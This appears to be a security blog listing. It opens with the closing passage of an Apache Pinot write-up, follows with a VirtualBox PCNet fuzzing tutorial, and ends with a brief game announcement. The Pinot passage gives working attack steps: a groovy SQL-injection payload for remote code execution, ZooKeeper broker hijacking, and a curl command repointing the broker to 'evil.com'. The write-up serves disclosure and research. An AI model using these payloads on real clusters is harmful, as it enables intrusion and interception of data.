/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables, however the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

In further mitigation, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to the an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper e.g. to update the broker host like was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

Pinot is a modern database platform that can be attacked with old-school SQLi
SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
In the official container images, RCE means root on the Server component of the Pinot cluster
From here, other components can be affected to a certain degree
WTF is going on with OPTION()?
Pinot is under active development. Maturity will bring security improvements
In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Introduction to VirtualBox security research

2022-04-26T00:00:00+02:00

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the binary VirtualBox from the out/linux.amd64/debug/bin/VirtualBox directory will be created. Before creating our first guest host, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing to selectively enable the logging of specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness, that we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only remaining thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter ones are currently not used, but we can add our own functions and call them, by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use the modified VboxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger class:

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VboxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
        PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
        PVM pVM = pUVM->pVM;


        if (SUCCEEDED(hrc)) {

          PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
          PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

In the same file after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, append __AFL_FUZZ_INIT(); before defining the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying the user-controlled data by using access I/O port instructions or reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, after some consideration for the implementing of our fuzzing framework, we discovered Fuzzed Data Provider (later FDP).

FDP is part of the LLVM and, after we pass it a buffer generated by AFL, it can leverage it to generate a restricted set of numbers, bytes, or enums. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some buffer.

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using convenient macro PDMDEVINS_2_DATA. Likewise, we can extend the state structure (in our case PCNETSTATE) to include the FDP header file via a pointer to FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too :

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful and include them inside R3 only parts. The easiest way is to find the R3 constructor and add new code just after that, as it already has defined the IN_RING3 macro for the conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even when we can reach more than 10k executions per second, we still have some work to do about the stability.

Improving Stability

Unfortunately, none of these methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module was dynamically loaded, therefore partially disabling instrumentation was not possible nor was possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References

H1.Jack, The Game

2022-02-16T00:00:00+01:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft.

